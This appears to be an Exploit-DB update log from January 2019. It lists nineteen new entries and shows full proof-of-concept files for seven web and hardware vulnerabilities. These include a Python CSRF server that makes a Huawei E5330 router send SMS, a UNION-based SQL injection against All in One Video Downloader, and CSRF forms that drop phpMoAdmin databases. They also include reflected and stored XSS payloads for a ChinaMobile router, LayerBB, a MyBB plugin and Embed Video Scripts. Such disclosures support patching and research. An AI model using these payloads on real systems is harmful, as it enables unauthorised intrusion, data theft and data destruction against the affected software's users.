DB: 2019-01-08

19 changes to exploits/shellcodes

Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference
BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)
SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)
Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)

KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation

Mailcleaner - Authenticated Remote Code Execution (Metasploit)
Embed Video Scripts - Persistent Cross-Site Scripting
All in One Video Downloader 1.2 - Authenticated SQL Injection
LayerBB 1.1.1 - Persistent Cross-Site Scripting
MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting
phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting
Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation
MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection
Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal
Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection
Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)

exploits/cgi/webapps/46081.txt

@@ -0,0 +1,20 @@
+# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS 
+# Date: 21/12/2018
+# Exploit Author: Kumar Saurav
+# Reference: https://0dayfindings.home.blog/2018/12/26/plc-wireless-router-gpn2-4p21-c-cn-reflected-xss/
+# Vendor: ChinaMobile
+# Category: Hardware
+# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
+# Tested on: Multiple
+# CVE : CVE-2018-20326
+
+#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user. 
+
+Reproduction Steps:
+Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case)
+Step 2: Login as Username and Password
+Step 3: After Login below url will be shown 
+        (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-)
+Step 4: Insert the payload "<script>alert("XSS-Saurav")</script>" at the end of the above mentinoed url and hit enter
+          (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("XSS-Saurav")</script>)
+Step 5: On execution of the payload, it will be popped up  as "XSS-Saurav"

exploits/hardware/webapps/46092.py

@@ -0,0 +1,49 @@
+# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS)
+# Date: 01/07/2019
+# Exploit Author: Nathu Nandwani
+# Website: http://nandtech.co/
+# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/
+# Version: 21.210.09.00.158
+# Tested on: Windows 10 x64
+# CVE: CVE-2014-5395
+# Note: The administrator who opens the URL should be authenticated.
+import socket
+import time
+
+server_ip = "0.0.0.0"
+server_port = 80
+
+huawei_ip = "192.168.8.1"
+receiving_phone_no = "01234567890"
+sms_text = "This is a SPAM text from Huawei E5330"
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.bind((server_ip, server_port))
+sock.listen(1)
+
+print "Currently listening at " + server_ip + ":" + str(server_port)        
+
+client, (client_host, client_port) = sock.accept()
+
+print "Client connected: " + client_host + ":" + str(client_port)
+print ""
+print client.recv(1000)
+
+client.send('HTTP/1.0 200 OK\r\n')
+client.send('Content-Type: text/html\r\n')
+client.send('\r\n')
+
+client.send("""
+<html>
+    <body>
+        <script>
+            var xhr = new XMLHttpRequest();
+            xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true);
+            xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text  + """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>');
+        </script>
+    </body>
+</html>
+""")
+
+client.close()
+sock.close()

exploits/php/webapps/46076.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Embed Video Scripts - Cross-site Script (stored)
+# Google Dork: N/A
+# Date: 1 Jan 2019
+# Exploit Author: Deyaa Muhammad
+# Author EMail: contact [at] deyaa.me
+# Author Blog: http://deyaa.me
+# POC Video: https://youtu.be/2CFJLwkxpT8
+# Vendor Homepage: https://codeawesome.in/embed/
+# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073
+# Demo Website: https://codeawesome.in/embed/
+# Version: N/A
+# Tested on: WIN7_x68/Linux
+# CVE : N/A
+
+# Description:
+A stored xss found in "Embed Video Scripts" comments section.
+
+# POC Request:
+
+:method: POST
+:authority: server
+:scheme: https
+:path: /embed/comments
+content-length: 145
+accept: */*
+origin: https://server
+x-requested-with: XMLHttpRequest
+user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+content-type: application/x-www-form-urlencoded; charset=UTF-8
+accept-encoding: gzip, deflate, br
+accept-language: en-US,en;q=0.9
+cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540
+cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6
+cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6
+
+message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png

exploits/php/webapps/46077.txt

@@ -0,0 +1,20 @@
+# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
+# Google Dork: "developed by Niche Office"
+# Date: 1 Jan 2019
+# Exploit Author: Deyaa Muhammad
+# Author EMail: contact [at] deyaa.me
+# Author Blog: http://deyaa.me
+# Vendor Homepage: https://nicheoffice.web.tr/
+# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
+# Demo Website: https://aiovideodl.ml/
+# Demo Admin Panel: https://aiovideodl.ml/admin/
+# Demo Admin Credentials: demo@aiovideodl.ml/123456
+# Version: 1.2
+# Tested on: WIN7_x68/cloudflare
+# CVE : N/A
+
+# POC:
+https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
+
+# Exploit:
+https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -

exploits/php/webapps/46079.txt

@@ -0,0 +1,24 @@
+# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting
+# Date: 10/4/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26
+# Version: 1.1.1
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-17997
+
+
+1. Description:
+LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs).
+
+
+2. Proof of Concept:
+
+- Start a new conversation sending to any user (victim) you want
+- Use a payload in the title  <script>alert('XSS')</script>
+- Next time the user (victim) visits the site payload will execute
+
+
+3. Solution:
+Update to 1.1.2

exploits/php/webapps/46080.txt

@@ -0,0 +1,26 @@
+# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting
+# Date: 12/31/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=396
+# Version: 1.8.3
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2019-3501
+
+
+1. Description:
+OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles.
+
+
+2. Proof of Concept:
+
+- Have a mod account level or higher
+- Go to Manage Awards in ModCP
+- Give an award to a user and input payload for reason   <script>alert('XSS')</script>
+
+- Payload executes when viewing award on awards.php and user profiles.
+
+
+3. Solution:
+Update to 1.8.19

exploits/php/webapps/46082.txt

@@ -0,0 +1,157 @@
+##################################################################################################################################
+# Exploit Title: phpMoAdmin 1.1.5 - MongoDB GUI | Multiple Vulnerabilities
+# Date: 03.01.2019
+# Exploit Author: Ozer Goker
+# Vendor Homepage: http://www.phpmoadmin.com
+# Software Link: http://www.phpmoadmin.com/file/phpmoadmin.zip
+# Version: 1.1.5
+##################################################################################################################################
+
+Introduction
+
+phpMoAdmin - MongoDB GUI
+MongoDB administration tool for PHP
+
+Vulnerabilities: CSRF | XSS Reflected & Stored
+
+CSRF details:
+
+#################################################################################
+
+CSRF1
+
+Create Database
+
+
+<html>
+<body>
+<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
+<input type="text" name="db" value="new.database"/>
+<input type="text" name="newdb" value="testdb"/>
+<input type="submit" value="Create DB"/>
+</form>
+</body>
+</html>
+
+
+#################################################################################
+
+CSRF2
+
+Drop Database
+
+<html>
+<body>
+<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
+<input type="text" name="action" value="dropDb"/>
+<input type="text" name="db" value="testdb"/>
+<input type="submit" value="Drop DB"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF3
+
+Repair Database
+
+<html>
+<body>
+<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
+<input type="text" name="action" value="repairDb"/>
+<input type="text" name="db" value="testdb"/>
+<input type="submit" value="Repair DB"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF4
+
+Add New Collection
+
+<html>
+<body>
+<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
+<input type="text" name="action" value="createCollection"/>
+<input type="text" name="db" value="testdb"/>
+<input type="text" name="collection" value="testcollection"/>
+<input type="submit" value="Create Collection"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF5
+
+Drop Collection
+
+<html>
+<body>
+<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
+<input type="text" name="action" value="dropCollection"/>
+<input type="text" name="db" value="testdb"/>
+<input type="text" name="collection" value="testcollection"/>
+<input type="submit" value="Drop Collection"/>
+</form>
+</body>
+</html>
+
+
+#################################################################################
+
+
+XSS details:
+
+#################################################################################
+
+XSS1 | Reflected
+
+URL
+http://localhost/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E
+
+METHOD
+Get
+
+PARAMETER
+db
+
+PAYLOAD
+<script>alert(1)</script>
+
+#################################################################################
+
+XSS2 | Reflected
+
+URL
+http://localhost/phpmoadmin/moadmin.php?db=new.database&newdb=testdb%3Cscript%3Ealert(2)%3C/script%3E
+
+METHOD
+Get
+
+PARAMETER
+newdb
+
+PAYLOAD
+<script>alert(2)</script>
+
+#################################################################################
+
+XSS3 | Stored
+URL
+http://localhost/phpmoadmin/moadmin.php?collection=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&action=createCollection&db=testdb
+
+METHOD
+Get
+
+PARAMETER
+collection
+
+PAYLOAD
+<script>alert(3)</script>
+
+
+#################################################################################